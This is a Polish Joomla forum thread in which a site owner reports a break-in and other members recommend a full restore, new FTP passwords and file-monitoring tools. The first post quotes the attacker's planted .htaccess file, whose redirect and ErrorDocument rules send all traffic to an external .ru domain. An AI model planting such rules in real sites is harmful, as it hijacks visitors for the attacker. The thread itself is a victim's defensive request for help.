PDA

Zobacz pełną wersję : wklejanie pliku htaccess, włamanie



cyryllo
17-04-2010, 16:35
Witam
Od kilku dni borykam się z problemem, że ktoś wkleja mi cały czas plik .htaccess z taką treścią:

# HostRule
RewriteEngine On
ErrorDocument 400 http://poi-seos.ru/index.php
ErrorDocument 401 http://poi-seos.ru/index.php
ErrorDocument 403 http://poi-seos.ru/index.php
ErrorDocument 404 http://poi-seos.ru/index.php
ErrorDocument 500 http://poi-seos.ru/index.php
RewriteEngine on
RewriteCond %{HTTP_HOST} !^poi-seos\.ru
RewriteRule ^(.*)$ http://poi-seos.ru/index.php [R=permanent,L]
# /HostRuledo katalogu ze zdjęciami i po kliknięciu na zdjęcie (czasem nie widać wogóle zdjęć) przerzuca na tą stronę.
Sprawdzałem logi i nic nie ma aby ktoś o tej godzinie co plik powstał ktoś coś robił:/
Wysłałem zgłoszenie do ovh.pl o sprawdzenie w ich statystykach ale znając ich to poczekam do poniedziałku.

Uprawnienia do pliku mam dobre, więc nie wiem o co chodzi, robiłem aktualizacje komponentów.

Dziwne jest też to że nawet zmieniając uprawnienia do pliku .htaccess na brak zapisu i tak gość może zapisywać :/

Ma ktoś jakiś pomysły?

moje
17-04-2010, 16:45
Polecam np. wiki.joomla.p + włamanie, wiki.joomla.p + zabezpieczenie ;)

cyryllo
17-04-2010, 16:47
Czytane. Mam zabezpieczone wstrzykiwanie kodu itp.
Chcę się obejść bez reinstalacji całej strony. Ale jak będę zmuszony no to trudno :/

zwiastun
17-04-2010, 17:01
Po prostu wykonaj całą procedurę odtwarzania witryny po włamaniu. Jeśli nie miałeś, a pewno nie miałeś, narzędzi umożliwiających wychwycenie zmian dokonanych w plikach (np. QuardXT), to "cząstkowa" naprawa odbywa się raczej na oślep i nieskutecznie

cyryllo
17-04-2010, 17:05
No właśnie tu popełniłem ten błąd :/
A takie małe pytanie czy mógł mi coś zmodyfikować w bazie danych?
Najlepsze jest to że ten plik tworzy tylko w jednym katalogu ze zdjęciami który sam stworzyłem

abbadona
17-04-2010, 17:13
Polecam Eyesite (http://extensions.joomla.org/extensions/access-a-security/site-security/9149).
Mnie osobiście bardzo pomógł w zmonitorowaniu których plików "dotykał" hakjer. Jak zestawiłem logi z serwera z informacjami z Eyesite to miałem dość dokładny obraz jego poczynań na serwerze. Oczywiście to nie jest środek na przeciwdziałanie włamaniu, ale pomaga już po.

malkowitch
17-04-2010, 17:29
A zmieniałeś chociażby dane dostępowe FTP?
To najczęstszy sposób dostania się do strony różnych świństw.
Zalecał także bym przeskanowanie przy rozruchu kompa antywirusem.

cyryllo
17-04-2010, 17:41
Zmieniłem wszystkie hasła. Kompa skanowałem. Ale od teraz to łącze się już tylko z Linuksa.
Mnie tylko dziwi fakt że ma dostęp tylko do jednego katalogu.

Sprawdziłem daty modyfikacji plików i żadne z głównych pików nie była modyfikowana ostatnio, przeglądnełem pliki szablonu ale też czysto.

Edit:

A tak z ciekawości jakie kraje blokujecie na swoich stronach?

abbadona
17-04-2010, 18:12
Wychodzi na to, że musisz zrobić to co radzi zwiastun.
Jeżeli masz dostęp do jednego katalogu to znaczy to:
- że tylko ten katalog możesz otworzyć?
- że tylko tam możesz coś zapisać?
- a możesz skasować inne katalogi?
Jeżeli masz podmieniany htaccess, to możliwe jest, że masz zablokowany dostęp do tych katalogów właśnie takimi plikami.
I tu wracamy do tego, że ratuje cię tylko pełna czystka i odtworzenie - jak pisze zwiastun.

ps. jak ktoś pisze, że "przejrzał" pliki joomli to słabo mi się robi, jak to zrobiłeś? ile czasu ci to zajęło?, ile przeoczyłeś?, czego szukałeś? dat modyfikacji? daty utworzenia? jak rozróżniłeś jedną od drugiej? a może sprawdzałeś czas modyfikacji lub utworzenia?
no i ostatnie pytanie jak masz dostęp tylko do jednego katalogu to ja mogłeś przejrzeć pliki joomla? które to twoim zdaniem są "pliki główne"?

jeszcze mógłbym tak długo pytać ale podpaść adminom nie chcę ;)

dwa tygodnie temu miałem włamanie, od tego czasu miałem ponad 250 kolejnych prób. Wiem jak to jest nie fajnie - chętnie w miarę swoich skromnych doświadczeń ci pomogę, ale prośbę mam:
a. czytaj co ktoś ci poleca zrobić
b. rób to zgodnie z instrukcją
c. pisz posty jak najściślej i dokładnie

cyryllo
17-04-2010, 18:30
Napisałem że ten ktoś co wrzuca pliki ma prawdopodobnie dostęp do tylko tego jednego katalogu i w nim dodaje ten plik. Ja mam pełny dostęp do plików.
A jeśli chodzi o przeglądanie plików to przeglądnąłem tylko szablon + kilka innych które wydawały mi się podejrzane głównie patrząc na datę modyfikacji.

zwiastun
17-04-2010, 18:36
Nie tłumacz się, tylko bierz się za sprzątanie. Przywrócenie witryny po włamaniu to nie zabawa na 5 minut. Bandzior ma nie tylko klucze do Twojego gospodarstwa, ale ma swoje wejścia, o których Ty nie masz pojęcia. Pisanie i usprawiedliwianie się na forum nic Ci nie da.